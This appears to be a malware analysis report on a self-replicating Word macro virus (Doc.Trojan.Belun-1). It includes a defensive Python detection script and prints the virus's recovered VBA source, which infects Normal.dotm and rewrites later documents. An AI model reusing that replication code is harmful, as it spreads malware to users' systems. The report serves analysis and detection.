Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1137.001 Office Application Startup: Office Template Macros (the analyzer tagged T1547.001 Registry Run Keys / Startup Folder, but the recovered source touches neither the registry nor a startup folder; its persistence mechanism is the Normal.dotm infection described below)
The sample is a Word document carrying a VBA macro in a module named 'uebel'. Its AutoOpen subroutine calls IstMirSchlecht, which enumerates the VBA components of both the Normal template (NormalTemplate.VBProject.VBComponents) and the active document. In each project it deletes any existing module named 'Modul1' via Application.OrganizerDelete, adds the VBIDE extensibility type library (GUID {0002E157-0000-0000-C000-000000000046}) to the project references if it is missing, creates a new standard module, renames it to 'uebel', and copies the source of the 'uebel' module into it with CodeModule.AddFromString. Copying runs in whichever direction is needed: document to Normal.dotm (followed by NormalTemplate.Save) when the template is clean, and Normal.dotm to document (followed by ActiveDocument.SaveAs) when the document is clean. This is Normal-template self-replication: the macro persists in the user's Normal.dotm and is written into documents opened and saved afterwards. The recovered source contains no payload beyond this replication logic; the ClamAV detection Doc.Trojan.Belun-1 corroborates the verdict.

Practitioner notes: programmatic access to VBProject requires the Word Trust Center option 'Trust access to the VBA project object model' (HKCU\Software\Microsoft\Office\<version>\Word\Security, AccessVBOM = 1), which is off by default. Because the 'On Error Resume Next' line is commented out, a host with that option off raises a runtime error at the first VBProject access and is not infected. To check a suspect host, extract the VBA from %APPDATA%\Microsoft\Templates\Normal.dotm (for example with olevba) and look for a module named 'uebel'.
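The replication pattern above reduces to a handful of API touches (an auto-exec entry point, NormalTemplate.VBProject access, module creation, CodeModule copying, the VBIDE reference, saving Normal.dotm) that a triage script can score. The following is an added example, not analyzer code and not the sample's own code: it runs over VBA source as printed by `olevba -c <document>` (or extracted from a suspect Normal.dotm). The indicator names, weights and threshold are this example's own choices, not a published signature, and the two embedded samples are constructed excerpts, the first modelled on the recovered macro.

```python
"""Triage helper for Normal-template self-replicating VBA.

Added example, not analyzer code and not the sample's own code. Feed it the
VBA source that `olevba -c <document>` prints, or the VBA extracted from a
Normal.dotm you suspect is infected. Indicator names, weights and the
threshold are this example's own choices, not a published signature.
"""
import re
import sys
from dataclasses import dataclass, field

# Type library GUID of "Microsoft Visual Basic for Applications Extensibility
# 5.3" (VBIDE). A macro needs this reference to drive the VBA editor itself.
VBIDE_TYPELIB_GUID = "{0002E157-0000-0000-C000-000000000046}"

# (indicator, weight, regex); every regex is applied with re.I | re.M.
INDICATORS = (
    ("auto_exec_sub", 2,
     r"^\s*(?:public\s+|private\s+)?sub\s+(?:autoopen|autoexec|autonew|autoclose|document_open)\s*\("),
    ("normal_template_vbproject", 3, r"normaltemplate\.vbproject"),
    ("adds_std_module", 2, r"\.add\s*\(?\s*vbext_ct_stdmodule"),
    ("copies_code_lines", 3, r"\.codemodule\.(?:addfromstring|lines|countoflines)"),
    ("adds_vbide_reference", 2,
     r'references\.addfromguid\s+"' + re.escape(VBIDE_TYPELIB_GUID) + r'"'),
    ("organizer_delete", 1, r"application\.organizerdelete"),
    ("saves_normal_template", 2, r"normaltemplate\.save\b"),
    ("resaves_active_document", 1, r"activedocument\.saveas\b"),
)


@dataclass
class Verdict:
    score: int
    hits: dict = field(default_factory=dict)   # indicator -> occurrence count
    self_replicating: bool = False


def module_names(source):
    """Module names from the 'Attribute VB_Name' headers olevba emits.

    The injected module's name (here 'uebel') is what to hunt for in
    %APPDATA%\\Microsoft\\Templates\\Normal.dotm on affected hosts.
    """
    return re.findall(r'^Attribute VB_Name = "([^"]+)"', source, re.M)


def scan(source, threshold=8):
    """Weight the indicators found in `source` and decide on self-replication."""
    hits, score = {}, 0
    for name, weight, pattern in INDICATORS:
        count = len(re.findall(pattern, source, re.I | re.M))
        if count:
            hits[name] = count
            score += weight
    # The score alone is not enough: require an auto-exec entry point AND code
    # that reaches into the Normal template's project, the pair that makes a
    # document infect every later session rather than just itself.
    replicates = (
        score >= threshold
        and "auto_exec_sub" in hits
        and "normal_template_vbproject" in hits
    )
    return Verdict(score=score, hits=hits, self_replicating=replicates)


# Constructed excerpt modelled on the recovered macro (not the full 9 KB file).
SAMPLE_MALICIOUS = r'''
Attribute VB_Name = "ThisDocument"
Attribute VB_Name = "uebel"
Sub AutoOpen()
IstMirSchlecht
End Sub
Sub IstMirSchlecht()
Set Norm = NormalTemplate.VBProject.VBComponents
Set Acti = ActiveDocument.VBProject.VBComponents
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:="Modul1", Object:=wdOrganizerObjectProjectItems
NormalTemplate.VBProject.References.AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
Norm.Add (vbext_ct_StdModule)
ActContent = ActiveDocument.VBProject.VBComponents("uebel").CodeModule.Lines(1, 10)
Norm("uebel").CodeModule.AddFromString (ActContent)
NormalTemplate.Save
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
'''

# Constructed benign macro: an AutoOpen that only edits the open document.
SAMPLE_BENIGN = r'''
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
ActiveDocument.Range.InsertBefore "Reviewed " & Date & vbCr
ActiveDocument.Save
End Sub
'''

if __name__ == "__main__":
    # Usage: python triage_vba.py macros.bas   (defaults to the built-in sample)
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE_MALICIOUS
    result = scan(text)
    print("modules:", module_names(text))
    print("score:", result.score, "hits:", result.hits)
    print("self-replicating:", result.self_replicating)
```

The requirement that both an auto-exec routine and NormalTemplate.VBProject access be present is deliberate: a document that rewrites only its own project scores high but does not outlive the session, and a template that merely reads NormalTemplate without an AutoOpen/AutoExec entry never runs on open. The benign sample triggers only the auto-exec indicator and stays well under the threshold.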
Heuristics (4)

- ClamAV: Doc.Trojan.Belun-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Belun-1.
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): the document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): the VBA project defines an AutoOpen subroutine, which Word runs when the document is opened and macros are enabled.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule's canned description ("no modern VBA project was recovered and no stronger macro-virus family marker was present") does not hold for this sample, whose VBA project was recovered (see macros.bas below); on its own the finding is evidence of old Word auto-execution surface, not a downloader or parser-CVE attribution.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9176 bytes | f92c9e11fe67ed3ae17fe4df01a44d537d39c1dbefb682346022f03062ba84e4 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "uebel"
Sub AutoOpen()
IstMirSchlecht
End Sub
Sub IstMirSchlecht()
'On Error Resume Next
Set Norm = NormalTemplate.VBProject.VBComponents
Set Acti = ActiveDocument.VBProject.VBComponents
Const ActiveModulName = "uebel"
For i = 1 To Norm.Count
If Norm(i).Name = ActiveModulName Then NormIns = True
If Norm(i).Name = "Modul1" And NormIns = False Then KillSomeNormModul = True
Next
For i = 1 To Acti.Count
If Acti(i).Name = ActiveModulName Then ActIns = True
If Acti(i).Name = "Modul1" And ActIns = False Then KillSomeActModul = True
Next
If KillSomeNormModul = True Then
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:="Modul1", Object:=wdOrganizerObjectProjectItems
End If
If KillSomeActModul = True Then
Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:="Modul1", Object:=wdOrganizerObjectProjectItems
End If
If NormIns = False Then
CheckRefNormal
Norm.Add (vbext_ct_StdModule)
Norm("Modul1").Name = ActiveModulName
ActiveLines = ActiveDocument.VBProject.VBComponents(ActiveModulName).CodeModule.CountOfLines
ActContent = ActiveDocument.VBProject.VBComponents(ActiveModulName).CodeModule.Lines(1, ActiveLines)
Norm(ActiveModulName).CodeModule.AddFromString (ActContent)
NormalTemplate.Save
End If
If ActIns = False Then
CheckRefActive
Acti.Add (vbext_ct_StdModule)
Acti("Modul1").Name = ActiveModulName
NormLines = NormalTemplate.VBProject.VBComponents(ActiveModulName).CodeModule.CountOfLines
NormContent = NormalTemplate.VBProject.VBComponents(ActiveModulName).CodeModule.Lines(1, NormLines)
Acti(ActiveModulName).CodeModule.AddFromString (NormContent)
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
Function CheckRefNormal()
CheckRefNormal = False
For i = 1 To NormalTemplate.VBProject.References.Count
If NormalTemplate.VBProject.References(i).Name = "VBIDE" Then CheckRefNormal = True
Next
If CheckRefNormal = False Then
NormalTemplate.VBProject.References.AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If
End Function
Function CheckRefActive()
CheckRefActive = False
For i = 1 To ActiveDocument.VBProject.References.Count
If ActiveDocument.VBProject.References(i).Name = "VBIDE" Then CheckRefActive = True
Next
If CheckRefActive = False Then
ActiveDocument.VBProject.References.AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If
End Function
' Processing file: /opt/analyzer/scan_staging/6347f529b1754315b9a9fde4025c806e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1586 bytes
' Macros/VBA/uebel - 6220 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' ArgsCall IstMirSchlecht 0x0000
' Line #2:
' EndSub
' Line #3:
' FuncDefn (Sub IstMirSchlecht())
' Line #4:
' QuoteRem 0x0000 0x0014 "On Error Resume Next"
' Line #5:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set Norm
' Line #6:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set Acti
' Line #7:
' Dim (Const)
' LitStr 0x0005 "uebel"
' VarDefn ActiveModulName
' Line #8:
' Line #9:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld Norm
' MemLd Count
' For
' Line #10:
' Ld i
' ArgsLd Norm 0x0001
' MemLd New
' Ld ActiveModulName
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St NormIns
' EndIf
' Line #11:
' Ld i
' ArgsLd Norm 0x0001
' MemLd New
' LitStr 0x0006 "Modul1"
' Eq
' Ld NormIns
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' LitVarSpecial (True)
' St KillSomeNormModul
' EndIf
' Line #12:
' StartForVariable
```

... (truncated)